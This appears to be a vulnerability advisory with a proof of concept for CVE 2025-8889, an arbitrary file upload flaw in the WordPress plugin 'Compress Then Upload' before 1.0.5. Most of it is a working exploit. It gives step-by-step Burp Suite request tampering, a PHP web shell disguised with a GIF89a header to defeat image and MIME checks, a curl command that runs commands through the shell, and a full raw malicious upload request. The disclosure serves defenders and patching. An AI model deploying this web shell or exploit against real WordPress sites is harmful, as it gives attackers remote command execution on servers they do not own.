Compress Then Upload < 1.0.5 – Admin+ Arbitrary File Upload | CVE 2025-8889

Description

The plugin does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)

Proof of Concept

Step 1: Prepare a regular image file  
- Create a regular image file, e.g. regular.jpg (any valid JPG file).

Step 2: Upload the regular image via WordPress Admin Panel  

1. Login to WordPress Admin Panel with a user with admin privileges.  
2. Navigate to Media > Compress Then Upload Images (plugin’s upload interface).  
3. Upload regular.jpg normally.

Step 3: Intercept and modify the upload request with Burp Suite  

1. While the upload is in progress, intercept the HTTP multipart request in Burp Suite.  
2. Modify the request as follows:  
        - Change the filename field from filename="regular.jpg" to filename="evil.php".  
        - Replace the entire content (body) of the file part with PHP web shell code:

```GIF89a;
            <?php
                if (isset($_GET['cmd'])) {
                    system($_GET['cmd']);
                }
            ?>
```

Note: The GIF89a; signature mimics the header of a valid GIF file, helping to bypass weak server-side image validations.

3. Keep the Content-Type header as image/jpeg (to bypass weak MIME-type checks).
4. Forward the modified request to the server.

Step 4: Trigger the uploaded web shell

1. If upload is successful, the PHP file will be saved in the uploads directory, e.g.:
        http://example.com/wp-content/uploads/2025/07/evil.php

    2. Access the shell via browser or curl:
        curl "http://example.com/wp-content/uploads/2025/07/evil.php?cmd=id"


## Example Malicious Upload Request (Burp Suite)

```
POST /index.php?rest_route=/wpctu-api/v1/upload HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:8000/wp-admin/upload.php?page=wpctu
X-WP-Nonce: 183bb6840c
Content-Type: multipart/form-data; boundary=---------------------------84370386938958108013960448980
Content-Length: 294
Origin: http://localhost:8000
Connection: keep-alive
Cookie: Drupal.toolbar.collapsed=0; language=tr_TR; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=g1hptYSytwcpIDTmF1fbHbh3tKsn4uVVhjMt92IP1Tn6s1KuZzhxQt7OIlaTxVFV8S7VtJzcejSEVuWotnnIYgsB1FZNfR1HJQtWJ; wp-settings-time-1=1753239294; security_level=0; _clck=dznimz%7C2%7Cfxt%7C0%7C2029; wp-settings-1=libraryContent%3Dupload%26editor%3Dhtml; PHPSESSID=8a1101006f7afe7da430edaccd3bc94e; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=muhammed%7C1753452205%7CqJxs22ZtjkfwU7Af3qUhdzbhXM8Os8ucTpbVnD6cn6G%7Ca09e2b80ad6b8866b8f21b55a776787e4783d18cd932106a462011e5447d111b
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------84370386938958108013960448980
Content-Disposition: form-data; name="file"; filename="evil.php"
Content-Type: image/jpeg

GIF89a;
<?php
	if (isset($_GET['cmd'])) {
		system($_GET['cmd']);
	}
?>
-----------------------------84370386938958108013960448980--
```